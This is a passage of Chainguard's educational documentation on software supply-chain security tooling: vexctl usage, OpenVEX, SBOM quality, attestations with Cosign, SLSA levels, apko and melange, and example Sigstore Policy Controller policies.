github.com/openvex/vexctl@latest This command will install the latest version of vexctl on your machine. Confirming Installation You can confirm that vexctl was installed and is ready to use by running the following command: vexctl version You should receive output similar to the following. _ _ _____ __ __ _____ _____ _ | | | || ___|\ \ / // __ \|_ _|| | | | | || |__ \ V / | / \/ | | | | | | | || __| / \ | | | | | | \ \_/ /| |___ / /^\ \| \__/\ | | | |____ \___/ \____/ \/ \/ \____/ \_/ \_____/ vexctl: A tool for working with VEX data GitVersion: ... ... Platform: ... This indicates the current version of vexctl on your working machine. You are ready to proceed with working with vexctl. Creating VEX Documents With vexctl, VEX data can be created to a file on disk, or it can be captured in a signed attestation that can be attached to a container image. You can create a VEX document by using the vexctl create command. For example, to create a VEX document with a single statement asserting that the WolfiOS package git-2.38.1-r0 is not affected by a given common vulnerability and exposure (CVE) — let’s say, CVE-2014-123456 — because it has already been mitigated in the distribution, you can run the following. vexctl create --product="pkg:apk/wolfi/git@2.38.1-r0?arch=x86_64" \ --vuln="CVE-2014-123456" \ --status="not_affected" \ --justification="inline_mitigations_already_exist" This command notes the following: The software product — product — in this case a Wolfi package The vulnerability — vuln — in this case a specific CVE The current status — status — which can be not_affected, affected, fixed, or under_investigation When the status is noted as not_affected, the reason for the status — justification — must be included, and can read inline_mitigations_already_exist or component_not_present The vexctl create command above renders the following document. { "@context": "https://openvex.dev/ns", "@id": "https://openvex.dev/docs/public/vex-cfaef18d38537412a0307ec266bed56aa88fa58b7c1f2c6b8c9ef997028ba4bd", "author": "Unknown Author", "role": "Document Creator", "timestamp": "2023-01-10T20:24:50.498233798-06:00", "version": "1", "statements": [ { "vulnerability": "CVE-2014-123456", "products": [ "pkg:apk/wolfi/trivy@0.36.1-r0?arch=x86_64" ], "status": "not_affected", "justification": "component_not_present" } ] } You can also create a VEX document with abbreviated information. For instance, when a given CVE was addressed in the image and you want to attest that it has been fixed. vexctl create "pkg:apk/wolfi/git@2.39.0-r1?arch=x86_64" CVE-2023-12345 fixed The above workflow demonstrates how to create a VEX document with vexctl on the command line. Merging Existing VEX Documents When more than one stakeholder is issuing VEX metadata about a piece of software, vexctl can merge the documents to get the most up-to-date impact assessment of a vulnerability. Let’s begin with two test documents. You can create these two test documents with a CLI editor such as nano. The first document is document1.vex.json: { "@context": "https://openvex.dev/ns/v0.2.0", "@id": "https://openvex.dev/docs/public/vex-0f3be8817faafa24e4bfb3d17eaf619efb1fe54923b9c42c57b156a936b91431", "author": "John Doe", "role": "Senior Trusted VEX Issuer", "version": 1, "statements": [ { "vulnerability": { "name": "CVE-1234-5678" }, "products": [ { "@id": "pkg:apk/wolfi/bash@1.0.0" } ], "status": "under_investigation", "timestamp": "2023-12-05T05:04:34.77929922Z" } ], "timestamp": "2023-12-05T05:04:34.77929844Z" } The second document is document2.vex.json: { "@context": "https://openvex.dev/ns/v0.2.0", "@id": "https://openvex.dev/docs/public/vex-3cd938c9a706eba0915883640116cfe813f7d59150cf758b8c869b4926a7cf11", "author": "John Doe", "role": "Senior Trusted VEX Issuer", "version": 1, "statements": [ { "vulnerability": { "name": "CVE-1234-5678" }, "products": [ { "@id": "pkg:apk/wolfi/bash@1.0.0" } ], "status": "fixed", "timestamp": "2023-12-05T05:06:38.099731287Z" } ], "timestamp": "2023-12-05T05:06:38.099730576Z" } The two files are generated from a known rule set, also known as “golden data” or a “golden file,” which is reused and reapplied to new releases of the same project. We can merge the two VEX documents with the vexctl merge command: vexctl merge --product=pkg:apk/wolfi/bash@1.0.0 \ document1.vex.json \ document2.vex.json The resulting document combines the VEX statements that express data about bash@1.0.0 into a single document. { "@context": "", "@id": "merged-vex-67124ea942ef30e1f42f3f2bf405fbbc4f5a56e6e87684fc5cd957212fa3e025", "author": "Unknown Author", "role": "Document Creator", "timestamp": "2023-02-03T21:48:39.582648-05:00", "version": "", "statements": [ { "vulnerability": "CVE-1234-5678", "timestamp": "2022-12-22T16:36:43-05:00", "products": [ "pkg:apk/wolfi/bash@1.0.0" ], "status": "under_investigation" }, { "vulnerability": "CVE-1234-5678", "timestamp": "2022-12-22T20:56:05-05:00", "products": [ "pkg:apk/wolfi/bash@1.0.0" ], "status": "fixed" } ] } This final document tells the whole story of how CVE-2014-123456 was under_investigation and then fixed four hours later, all documented in a single VEX file that was merged with vexctl. Attesting and Attaching VEX Documents To attest to and attach VEX statements within a given document to a container image, you can use the vexctl attest command with the --attach and --sign flags. For example, if you have a container image your-username/your-container-image:latest in a container registry, and a related VEX document hello.vex.json, you can run the following command to attest to that document, attach the document and sign that attestation. If you want to try this example, make sure to replace your-username/your-container-image:latest with the path to your container. vexctl attest --attach --sign hello.vex.json your-username/your-container-image:latest Upon running this command, you’ll be taken through a signing workflow with Sigstore. Your terminal output will indicate your progress. Generating ephemeral keys... Retrieving signed certificate... A browser window will open for you to select an OIDC provider. When the attestation is complete, you’ll receive feedback that it was successful. Successfully verified SCT... {"payloadType":"application/vnd.in-toto+json","payload":"e...o=","signatures":[{"keyid":"","sig":"MEY...z"}]} This attestation with .att extension will now live in the container registry as an attachment to your container. Chronology and VEX Documents Assessing the impact of CVEs on a software product is process that takes time and the status will change over time. VEX is designed to communicate with users as the status changes, and there may therefore be multiple VEX documents associated with a product. To understand how this may work in practice, below is an example timeline for the VEX documents associated with a given product and CVE. The software product Linky App becomes aware of CVE-2014-123456, associated with one of its components. Linky App developers issue a VEX data file with a status of under_investigation to inform their users that they are aware of the CVE, but are reviewing whether it has an impact on Linky App. After investigation, the developers determine the CVE has no impact on Linky App because the vulnerable function in the component is never executed. The developers issue a second VEX document with a status of not_affected using the vulnerable_code_not_in_execute_path justification. When analyzing the VEX documents associated with Linky App, vexctl will review them chronologically and “replay” the known impact statuses in the order they were found, effectively computing the not_affected status. If a SARIF report is formatted as a VEX document with vexctl, any entries alerting of CVE-2014-123456 will be filtered out. Learn More The vexctl tool is open source, you can review the vexctl repository on GitHub, as well as the go-vex Go library for generating, consuming, and operating on VEX documents. The following blog posts have some background about VEX and OpenVEX: What is OpenVex Putting VEX To Work Reflections on Trusting VEX (or when humans can improve SBOMs) Understanding The Promise of VEX The OpenVEX Specification is owned and steered by the community. You can find the organization page with additional repositories at openvex.dev. --- ### melange Overview URL: https://edu.chainguard.dev/open-source/build-tools/melange/overview/ Last Modified: August 1, 2024 Tags: melange, Overview melange is an apk builder tool that uses declarative pipelines to create apk packages. It is part of the open source tooling used for Wolfi, which is the operating system used to power Chainguard Containers. From a single YAML file, users are able to generate multi-architecture apks that can be injected directly into apko builds. The following diagram contains an overview of the apko and melange ecosystem and how they work together to compose apk-based images, using either Wolfi or Alpine as base system. For more information and up-to-date examples on how to use melange, please refer to the melange repository on GitHub. --- ### apko Overview URL: https://edu.chainguard.dev/open-source/build-tools/apko/overview/ Last Modified: May 2, 2024 Tags: apko, Overview apko is a command-line tool designed to create single-layer container images based on the apk package format. It was so named as it uses the apk package format and is inspired by the ko build tool. apko is part of the open source toolkit developed by Chainguard to build Chainguard Containers. The following diagram contains an overview of the apko ecosystem and how it interacts with melange for building apk-based images, using either Wolfi or Alpine as base system. For more information and up-to-date examples on how to use apko, please refer to the apko repository on GitHub. --- ### What Makes a Good SBOM? URL: https://edu.chainguard.dev/open-source/sbom/what-makes-a-good-sbom/ Last Modified: August 4, 2022 Tags: SBOM, Conceptual A software bill of materials, or an SBOM (pronounced s-bomb), is a formal record of the components contained in a piece of software. It is analogous to an ingredients list for a recipe. And it has become recognized as one of the key building blocks of software supply chain security. Proponents rightfully point out that organizations can’t secure their software if they don’t know what’s inside their software. As awareness and adoption of SBOM has grown, there has been a gradual acknowledgement that not all SBOMs are created equal, some are more or less useful, depending on the goals of the SBOM user and the contents of the SBOM. This guide exists to provide some guidance on evaluating the quality of an SBOM, suggesting common use cases and the data fields that support these use cases and open source SBOM quality tools. Basic SBOM Use Cases and Required SBOM Data Identifying Vulnerable Components: SBOMs can help organizations and individuals know the unfixed vulnerabilities in their software. By providing an inventory of components, this allows a software maintainer to check whether the versions of their component are associated with any known vulnerabilities. The software maintainer can then update or patch any components with known vulnerabilities. To enable this use case, SBOMs must contain information, at a minimum, about the component name and version. Because there are many different open source software package ecosystems, it is also advantageous to include information about the package ecosystem from which a component originates. This reduces the chances of a false positive when identifying potential vulnerabilities. A package URL (or purl) provides this ecosystem information. Additionally, SBOMs ought to include all transitive dependencies, dependencies of dependencies. Identifying Licenses: SBOMs can also help organizations and individuals use open source software consistent with the licensing terms of all components. By identifying all components and associated licenses, software teams can understand the legal implications of any decision related to incorporating a particular component. Some organization also wish to track, often for legal or procurement purposes, the “supplier” of a particular component. To enable license analysis, an SBOM must contain information about the license or licenses associated with all components. Additionally, there is a supplier data field that can help organizations understand component suppliers. Ensuring Software Integrity: SBOMs can also help organizations and individuals ensure software integrity, discovering instances of tampering where a party has introduced malicious functionality. Providing checksums for packages or files within the SBOM enables machine-verification of software integrity. Note: There are other SBOM use cases, such as mapping broader ecosystem risks, but this guide currently focuses on the arguably three relatively well-established SBOM use cases. Measuring SBOM Quality The tools for measuring SBOM quality — like the overall concept of SBOM quality itself — are nascent. There are currently two tools that are worth watching to evaluate SBOMs. SBOM Scorecard analyzes both major SBOM formats and returns a composite quality score indicating the extent to which an SBOM possesses key fields, including whether the components in the SBOM contain a purl and whether there are licenses associated with each component. NTIA Conformance Checker analyzes whether SPDX SBOM documents possess the data fields associated with the so-called “NTIA minimum elements.” The U.S. National Telecommunications and Information Administration “minimum elements” include the data fields deemed essential for basic SBOM use cases, including the identification of vulnerable components and the identification of component licenses. Learn More Check out Chainguard’s blog post on “Are SBOMs Any Good?” to see an application of these SBOM quality tools to a dataset of open source project SBOMs. You can also learn about the complications for SBOM quality created by “software dark matter.”. --- ### What is OpenVex? URL: https://edu.chainguard.dev/open-source/sbom/what-is-openvex/ Last Modified: November 21, 2024 Tags: SBOM, VEX, Conceptual OpenVEX is an open source specification, library, and suite of tools designed to enable software users to eliminate vulnerability noise and focus their security efforts on vulnerabilities that pose an immediate risk. Released by Chainguard in January 2023, it’s the first set of open source tools to support the VEX specification championed by the United States National Telecommunications and Information Administration (NTIA) and the Cybersecurity and Infrastructure Security Agency (CISA). With OpenVEX, stakeholders from across the software supply chain can collaborate on identifying and remediating exploitable vulnerabilities and use automation to enable more precise and efficient methods of security management. In this guide, you will learn more about the emerging supply chain security standards that OpenVEX supports, as well as how OpenVEX tooling can help you leverage them in your security management processes. SBOMs and VEX One of the most important ways you can protect your codebase from cyberattacks is to have timely and precise information about whether it contains known vulnerabilities. Unfortunately, many cyberattacks are able to broaden the scope of their damage after a vulnerability is publicly identified because individual software operators and end users are unaware that their codebase contains a known vulnerability and requires a patch. Many codebases are too complex and contain too many dependencies for their maintainers to have a comprehensive awareness of their contents. Incorporating software bills of materials (SBOMs) is a powerful way of improving visibility into your codebase so that vulnerabilities can be identified in a timely manner. When vulnerabilities are made known through security advisories, code owners and other users can refer to the tool’s SBOM to see if they have dependencies associated with the specified vulnerability. In this way, SBOMs represent a significant step forward in security management by enabling software users to quickly identify vulnerabilities, which can otherwise require a significant amount of labor. For example, one federal agency reportedly spent 33,000 hours responding to the Log4j vulnerability at the expense of other priorities. Though the SBOM’s improvement of visibility can greatly improve an organization’s security posture, it can also be accompanied by an overproduction of false positives. In this context, false positives are vulnerabilities that are associated with an organization’s codebase but have been determined to not be exploitable in specific circumstances. This increase in false positives can hinder an SBOM’s security utility as organizations are tasked with investigating the broadened list of vulnerabilities to see which ones pose genuine threats to their codebase. In cases like this, organizations may once again struggle to efficiently identify and respond to vulnerabilities before it is too late. Though the SBOM’s improvement of visibility can greatly improve an organization’s security posture, it can also be accompanied by an overproduction of false positives. In this context, false positives are vulnerabilities that are associated with an organization’s codebase but have been determined to not be exploitable in specific circumstances. When publishing a VEX document for a known software vulnerability, the author assigns the product a status drawn from the following list: NOT AFFECTED — No remediation is required regarding this vulnerability. AFFECTED — Actions are recommended to remediate or address this vulnerability. FIXED — These product versions contain a fix for the vulnerability. UNDER INVESTIGATION — It is not yet known whether these product versions are affected by the vulnerability. An update will be provided in a later release. Once published, downstream software users (such as operators or developers) can use these VEX documents to determine whether they are impacted by a vulnerability and what steps they might need to take to address it. Though VEX documents do not need to be used with an SBOM, together they offer a powerful and efficient way to comprehensively scan your codebase for vulnerabilities that matter. An SBOM helps you know whether you have dependencies associated with a vulnerability, while a VEX document tells you which of those vulnerabilities you can ignore. A further benefit of VEX documents is that they are machine readable, enabling users to integrate them into automated workflows and broader tooling to support efficient security management. VEX has value for stakeholders across the supply chain, enabling collaboration across suppliers, operators, and end users that can save the community significant amounts of time investigating and mitigating vulnerabilities. Software suppliers can use VEX to let their users know when they’ve already investigated a vulnerability and whether that vulnerability affects the product or if further action needs to be taken by the user. And in the case that end users investigate potential vulnerabilities without a security advisory, they can encode their findings in a VEX document to share with the supplier or track for future or ongoing investigations. How to Leverage VEX and SBOMs with OpenVEX To help software suppliers and users leverage VEX, Chainguard developed OpenVEX, an open source specification, library, and suite of tools based on the VEX standard. Developed in collaboration with CISA’s VEX Working Group, OpenVEX is the first format to meet the VEX Minimum Requirements and is designed to be lightweight in order to help support community adoption. A specification OpenVEX documents are JSON-LD files that capture the minimal requirements for VEX as defined by the VEX working group organized by CISA. You can think of the VEX minimal requirements as the “specification of specifications”, and the OpenVEX format as a lightweight, embeddable, integration-friendly spec that complies with the VEX specification. VEX documents are composed of metadata (such as the author and timestamp) and a series of statements that link together a software product (with an identifier that can be traced to an SBOM, such as a Package URL), a vulnerability (using a vuln identifier such as CVE or OSV) , and one of the four impact statuses defined by VEX (“not affected”, “affected”, “fixed”, and “under investigation”). For example, an OpenVEX document with one statement could be written like this: { "@context": "https://openvex.dev/ns", "@id": "https://openvex.dev/docs/example/vex-9fb3463de1b57", "author": "Wolfi J Inkinson", "role": "Document Creator", "timestamp": "2023-01-08T18:02:03.647787998-06:00", "version": "1", "statements": [ { "vulnerability": "CVE-2023-12345", "products": [ "pkg:apk/wolfi/git@2.39.0-r1?arch=armv7", "pkg:apk/wolfi/git@2.39.0-r1?arch=x86_64" ], "status": "fixed" } ] } The OpenVEX specification details additional information you can include in an OpenVEX document. For example, certain statuses require additional statement information. A statement with a not_affected status must include a status justification or an impact_statement describing why the product is not affected. A statement with a not_affected status might be written like this: { "vulnerability": "CVE-2023-12345", "products": [ "pkg:apk/wolfi/product@1.23.0-r1?arch=armv7", ], "status": "not_affected", "justification": "component_not_present", "impact_statement": "The vulnerable code was removed with a custom patch" } These additional fields allow users to include valuable context and justification for VEX statements that can help users prioritize vulnerabilities and know what further action they need to take. You can learn more about the OpenVEX Specification in the OpenVEX repo. A Go library The project has a Go library (openvex/go-vex) that lets projects generate, transform and consume OpenVEX files. It enables the ingestion of VEX metadata expressed in other VEX implementations. You can learn more about go-vex in the OpenVEX repo. A set of tools OpenVEX is also committed to building out tools that will allow software authors and consumers to work with VEX metadata. The first project in this initiative is vexctl, a CLI to create, merge and attest VEX documents. This tool can also be used to apply VEX documents to scanner results in order to filter out false positives. For example, you can create a VEX document using a vexctl create command like the following: vexctl create --product="pkg:apk/wolfi/git@2.38.1-r0?arch=x86_64" \ --vuln="CVE-2014-123456" \ --status="not_affected" \ --justification="inline_mitigations_already_exist" This code snippet will create the following OpenVEX document: { "@context": "https://openvex.dev/ns/v0.2.0", "@id": "https://openvex.dev/docs/public/vex-783356508926ad84f48fa51480d2ed85476160dd3d4169eb0024c346edd1f10b", "author": "Unknown Author", "timestamp": "2024-11-21T15:52:42.58376093-08:00", "version": 1, "statements": [ { "vulnerability": { "name": "CVE-2014-123456" }, "timestamp": "2024-11-21T15:52:42.583761761-08:00", "products": [ { "@id": "pkg:apk/wolfi/git@2.38.1-r0?arch=x86_64" } ], "status": "not_affected", "justification": "inline_mitigations_already_exist" } ] } Or, to filter out vulnerabilities from security scanner results that are fixed or not exploitable, you can use the vexctl filter command. In this example, scan_results.sarif.json is the file with the scanner results and vex_data.csaf contains the VEX information: vexctl filter scan_results.sarif.json vex_data.csaf This command will return output showing vulnerabilities from the scanner that are not resolved by the VEX document. To learn about other commands and capabilities of the vexctl tool, visit the OpenVEX repo. Learn More OpenVEX is actively evolving to support VEX adoption across the community, and will continue building out tooling and adjusting its specification to meet community needs. To learn more about VEX, check out related resources on Chainguard’s blog: Reflections on Trusting VEX (or when humans can improve SBOMs) Putting VEX to work Understanding the Promise of VEX What is VEX and Why Should I Care? You can also read more about VEX use cases in this report published by the Cybersecurity and Infrastructure Security Agency. --- ### The Differences between SBOMs and Attestations URL: https://edu.chainguard.dev/open-source/sbom/sboms-and-attestations/ Last Modified: March 19, 2023 Tags: Cosign, SBOM, Conceptual One of the first steps to improving your software supply chain security is to establish a process for creating quality Software Bills of Materials (SBOMs). An SBOM is a formal record that contains the details and supply chain relationships (such as dependencies) of the components used in building software. Cosign — a part of the Sigstore project — supports software artifact signing, verification, and storage in an OCI (Open Container Initiative) registry. The cosign command line tool offers two subcommands that you can use to associate an SBOM with a container image and then upload them to a registry: cosign attach and cosign attest. However, these commands don’t work the same way. This guide outlines the differences between these two subcommands and provides guidance for when you might want to use one over the other. SBOMs vs. Attestations An SBOM is essentially an electronic packing slip: it’s a list of all the components that went into making a given piece of software. But unless you have some indication of when the software was produced, who produced it, and how it was produced, then you can’t say with any certainty that the components listed in the SBOM are actually part of the software you’re running. An attestation allows the end users or consumers of a software artifact (in the context of this guide, an SBOM) to verify — independently of the producer — that the contents of the artifact haven’t been changed since it was produced. It also requires software producers to provide verifiable proof of the quality of their software. Put differently, an attestation is a written assurance of a software artifact’s provenance, or the verifiable information about the artifact describing where, when, and how it was produced. You can think of an attestation as a proclamation that “software artifact X” was produced by “person Y” at “time Z”. Because of this extra provenance information, attestations are generally seen as being more trustworthy than SBOMs since you can identify who signed them and when. Both cosign attest and cosign attach associate an artifact with an image and upload it to a registry. However, cosign attest generates an in-toto attestation while cosign attach does not. cosign attest then attaches it to the provided image and uploads it to a registry as an OCI artifact with a .att extension. In the following example, image.sbom is an SBOM file that was previously created, $IMAGE is the image that will be attached to the SBOM, and cosign.key is the signer’s private key. cosign attest --key cosign.key --predicate image.sbom $IMAGE Note that after creating an attestation, you can verify it with Cosign’s verify-attestation subcommand. cosign verify-attestation $IMAGE cosign attach, on the other hand, only attaches an SBOM to an image and uploads it to a registry. In this case the SBOM isn’t signed, meaning that there’s no way to confidently verify its authenticity. cosign attach sbom --sbom image.sbom $IMAGE This will upload the SBOM to the registry as an OCI artifact with a .sbom extension. Be aware that there is also the cosign sign command. After running cosign attach to attach an SBOM and upload it to a registry, you can then run cosign sign to sign the SBOM, and upload the signature to the registry as a separate OCI artifact, this time with the .sig extension. If you’d like to learn more about working with SBOMs and Cosign, we encourage you to checkout our tutorial on How to Sign an SBOM with Cosign. A note on generating SBOMs There are many tools available today — both proprietary and open source — that allow you to generate SBOMs. However, these tools do not generate SBOMs in the same way or at the same point in the development process. As with signed versus unsigned SBOMs, an organization may find SBOMs generated by one tool as more trustworthy than those from others. For example, SBOMs generated from source code can be valuable. But ultimately, you have no way of knowing whether the image has been tampered with between the time the SBOM was generated and the time you actually run the image. apko is a command-line tool that allows users to build container images using a declarative language based on YAML. When building a container image, apko will generate an SBOM outlining each of the apks it uses to build it. When combined with melange, an apk builder tool that uses declarative pipelines to create apk packages, these tools can serve as a good starting point for a secure container image factory. Checkout “Secure Your Software Factory with melange and apko” to learn more. --- ### What is SLSA? URL: https://edu.chainguard.dev/open-source/slsa/what-is-slsa/ Last Modified: June 12, 2023 Tags: SLSA, Conceptual SLSA (pronounced “salsa”), or Supply chain Levels for Software Artifacts, is a security framework consisting of standards and controls that prevent tampering, improve integrity, and secure packages and infrastructure. While cyberattacks like SolarWinds and Codecov have demonstrated the importance of protecting software from tampering and malicious compromise, the complexity of the software development lifecycle can leave many feeling unable to adequately understand or respond to these specific security issues. Released by Google’s Open Source Security Team in 2021, SLSA was created as a framework to help software creators understand where and how they can harden their supply chain security practices, and help software consumers evaluate the integrity of a software product or component before they decide to use it. SLSA was also designed around the creation of verifiable metadata, so that software consumers can set automated policies to prevent the deployment of code that does not meet their preferred SLSA level. Today, SLSA is a vendor-neutral project supported by the Open Source Security Foundation and is actively evolving its standards and supporting tools with industry input. In this guide, you will learn about SLSA tracks, levels, and security requirements, as well as emerging tools that can help you meet these requirements. SLSA Tracks and Levels Evolving from v0.1, SLSA v1.0 shifted to its current track structure, dividing requirements for key pillars of supply chain security into separate categories. Previously, the single unnamed SLSA track captured elements of different areas, making achieving high levels of SLSA difficult if a build fell short in some aspects. By restructuring SLSA into multiple tracks, organizations can focus on hardening one aspect of their security without being blocked by the status of a different track. SLSA levels are designed to function as a ladder so that developers and organizations can incrementally work towards achieving a security posture appropriate for their risk profile. Some software projects may take more time to advance up the ladder, so this framework offers a piecemeal approach that may be more realistic (and encouraging) than trying to meet all of the requirements at once. As of this writing, SLSA offers a build track with three ascending levels of security, each containing a set of security requirements that expands on those of the prior level. The SLSA project has proposed adding additional tracks in a prospective version. Note that these tracks, levels, and/or their requirements may shift with the release of future SLSA versions. Build Track Focusing on an artifact’s provenance, the build track outlines three levels designed to provide verification that artifacts meet build expectations. Establishing provenance gives consumers information about who built an artifact, what inputs were used, and what process was used to build it. Comparing an artifact’s expected and actual provenance can help to stop supply chain threats in their tracks by ensuring artifacts are constructed from trustworthy materials, by credible sources. SLSA recommends its SLSA Provenance format for meeting provenance expectations. Build Level 1 Provenance showing how the package was built Level 1 sets a foundation for working towards subsequent build track levels. Software production methods must be consistent so standard expectations for future builds are set. In addition, artifact provenance containing information on the build must be automatically generated by the build platform. Software producers are responsible for distributing provenance metadata with package releases. While Level 1 does not prevent tampering, fulfilling its requirements represents an important first step in securing your software supply chain. Labeling your software with this level can also help consumers make informed decisions about whether it has been sufficiently secured and verified for their applications. For more information on getting started with reaching Level 1, visit SLSA’s quick start guide. Build Level 2 Signed provenance, generated by a hosted build platform Adding to the requirements of Level 1, Level 2 requires the use of a hosted build service like GitHub Actions, Google Cloud Build, or Travis CI rather than a developer’s local environment. The hosted service must sign the provenance it generates through the use of digital signatures, a method of verifying the authenticity and integrity of the software artifact. The stricter requirements for Level 2 help provide more protection against software tampering and enable greater levels of trust that the provenance data is accurately represented. For more information, check out SLSA’s guide on reaching level 2. Build Level 3 Hardened build platform As the highest level of the build track, Level 3 aims to increase trust and harden infrastructure through a variety of requirements designed to meet specific threats. The requirements are as follows: Isolated: The build steps must be run in an isolated environment without risk of influence from other build processes, such as a container or VM, that has been created specifically for the build. Environments must not be reused. Unforgeable: It must be impossible for the build service’s users to falsify provenance information. All provenance information must be generated by the build service in a trusted control plane, except for noted exceptions. Generating provenance compliant with Level 3 requirements can help end users verify the integrity of the software before implementing it. Recently, SLSA released the open source SLSA 3 Container Generator for GitHub Actions that helps ease the process by allowing you to build automated provenance generation into your container workflows. To learn more about how it works, visit the General availability of SLSA 3 Container Generator for GitHub Actions announcement blog post. You can also check out SLSA’s guide on reaching level 3. SLSA Tools and Practices The SLSA framework and its supporting tools and practices are still actively evolving. Some of the previously listed level requirements can be met using popular build and version control systems. More specific requirements may require additional tooling, and SLSA hosts some supporting tools in its GitHub repositories. As mentioned in the description of Level 3, SLSA released a tool for automating provenance generation with GitHub Actions in February 2023. To verify the SLSA provenance of a piece of software, you can use the slsa-verifier tool, which can verify a provenance generated by the slsa-github-generator tool or Google Cloud Build. Other tools, like Sigstore’s open source Policy Controller allow you to create policies around SLSA requirements in your Kubernetes cluster. Developers are also encouraged to include the corresponding SLSA level badge (Level 1, Level 2, Level 3) in their README once their codebase meets the level’s requirements. Learn more In this guide, you learned about how SLSA helps secure the software supply chain, the requirements for its three build track security levels, and some of the tools used to implement or confirm these levels. This knowledge will help you work towards achieving SLSA levels for your software projects, assess external software based on its SLSA levels, and use admissions controllers to set SLSA-based policies in your codebase. While SLSA provides a strong framework for verifying the authenticity and integrity of software, it is important to note that it does not protect against every type of supply chain attack. For example, SLSA requirements cannot prevent attacks enabled through vulnerable code, vulnerable build platforms, or collusion between high level actors. Still, SLSA offers a powerful framework for defending against common supply chain threats, and will likely emerge as a standard component of modern software as tooling and community adoption evolves. To learn more about SLSA, you can visit the SLSA website, read an in-depth overview of SLSA requirements, or explore the SLSA repository on GitHub. --- ### apko FAQs URL: https://edu.chainguard.dev/open-source/build-tools/apko/faq/ Last Modified: July 31, 2024 Tags: apko, FAQ Do I need to understand apko to use Chainguard Containers? No. Chainguard built apko as part of its open source tooling around the Wolfi operating system. While you can check out the project on GitHub and learn more, it’s not a prerequisite for using Chainguard Containers. How are apko images defined? apko images are defined declaratively using a YAML file. It was designed this way to facilitate reproducible builds — run apko twice, and you’ll get the same output. Does apko provide SBOMs? Yes, apko builds include high-quality SBOMs (software bills of materials) for all builds. This is a key feature of the tooling that Chainguard has developed to ensure that users can trust the software they are running. Can I use apko images with Docker? Yes, images built with apko are fully OCI compliant and can be used with any container runtime that supports the OCI image format. Can I mix Wolfi and Alpine package repositories to create my apko build environment? No, it’s not possible to mix Wolfi apks with Alpine apks. Can I execute arbitrary commands in apko builds such as in RUN steps in Dockerfiles? No, you can’t execute arbitrary commands in apko builds. apko provides directives for creating users and setting up directories and permissions, but any additional steps necessary at build time, such as the installation of packages and execution of shell commands, must be defined in apk packages that should be included in the list of build dependencies. This is an implementation feature to allow for reproducible builds and high-quality SBOMs. --- ### Example Policies URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/chainguard-enforce-policy-examples/ Last Modified: August 19, 2024 Tags: Open Source, Procedural, Policy, policy-controller, Reference, SBOM The Sigstore Policy Controller allows users to create their own security policies that they can be enforced on Kubernetes clusters. Here are a few example policies to help you get started. You may also review the Sigstore Policy Controller documentation. In particular, we encourage you to review the Policy Controller documentation relating to the Admission of images to learn how to admit images through the cluster image policy. Policy enforcing signed containers apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: signed-keyless spec: images: # All images - glob: "**" authorities: - keyless: url: https://fulcio.sigstore.dev ctlog: url: https://rekor.sigstore.dev Example using Chainguard Containers from Chainguard’s registry: ... images: - glob: cgr.dev/chainguard/** ... An example using Docker Hub images: ... images: - glob: "index.docker.io/*" - glob: "index.docker.io/*/*" ... An example using Google Cloud Registry: ... images: - glob: gcr.io/your-image-here/* ... Policy enforcing signer identity through an OIDC provider and subject apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: enforce-signer-oidc spec: images: - glob: "**" authorities: - keyless: identities: # <<<-- REPLACE the following with your OIDC provider & subject --> # - issuer: https://token.actions.githubusercontent.com subject: https://github.com/chainguard-dev/gke-demo/.github/workflows/release.yaml@refs/heads/main An alternate issuer and subject: ... - issuer: https://accounts.google.com subject: your-gmail@gmail.com Policy enforcing that images have a signed SPDX SBOM attestation from a custom key This policy asserts that all images must have a signed SPDX SBOM attestation from a custom key. apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: custom-key-attestation-sbom-spdxjson spec: images: - glob: gcr.io/your-image-here/* authorities: - name: custom-key key: data: | -----BEGIN PUBLIC KEY----- ... -----END PUBLIC KEY----- attestations: - name: must-have-spdxjson predicateType: spdxjson policy: type: cue data: | predicateType: "https://spdx.dev/Document" Set the POLICY and IMAGES environment variables appropriately, pointing to the sample policy and the image you would like to test. POLICY="policies/custom-key-attestation-sbom-spdxjson.yaml" Generate an SPDX SBOM, then attach the SBOM to your image: cosign attest --type spdxjson Next, sign it with a private key (for example, one located in a keys directory as in keys/cosign.key). export COSIGN_PASSWORD="" cosign attest --yes --type spdxjson \ --predicate sboms/example.spdx.json \ --key keys/cosign.key \ "${IMAGE}" Policy enforcing that releases are signed by GitHub Actions apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: image-is-signed-by-github-actions spec: images: # This is the release v0.3.0 - glob: "gcr.io/projectsigstore/policy-webhook@sha256:d1e7af59381793687db4673277005276eb73a06cf555503138dd18eaa1ca47d6" authorities: - keyless: # Signed by Fulcio url: https://fulcio.sigstore.dev identities: # Matches the Github Actions OIDC issuer - issuer: https://token.actions.githubusercontent.com # Matches a specific GitHub workflow on main branch. Here we use the # Sigstore policy controller example testing workflow as an example. subject: "https://github.com/sigstore/policy-controller/.github/workflows/release.yaml@refs/tags/v0.3.0" Policy allowing trusted GKE images apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: gke-trusted spec: images: - glob: gke.gcr.io/** - glob: gcr.io/gke-release/* authorities: - static: action: pass Enforce that cert-manager is signed apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: certmanager-signed spec: images: - glob: quay.io/jetstack/cert-manager-* authorities: - key: data: | -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAsZZKaaIRjOpzbiWYIDKO yry9XGBqAfve1iOGmt5VO1jpjNoEseT6zewozHfWTM7osxayy2WjN8G+QV39MlT3 Vxo91/31g+Zcq8KcvxG+iB8GRaD9pNgLmghorv+eYDiPYMO/+fhsLImyG5WEoPct MeCBD7umZ/A2t96U9DQxVDqQbTHlsNludno1p1wsgRnfUM3QHexNljDvJg5FcDMo dCpVLpRNvbw0lbJVfybJ4siJ5o/MmXzy0QCJpw+yMIqvqMc8qgKJ1yooJtuTVF4t 4/luP+EG/oVIiSWCFeRMqYdbJ3R+CJi+4LN7vFNYQM1Q/NwOB52RteaR7wnqmcBz qSYK32MM8xdPCQ5tioWwnPTRbPZuzsZsRmJsKBO9JUrBYdDntZX1xY5g4QNSufxi QgJgJSU7E4VGMvagEzB1JzvOr6A/qNFCO1Z6JsA3jw3cJLV1rSHfxqfSXBACTLDf 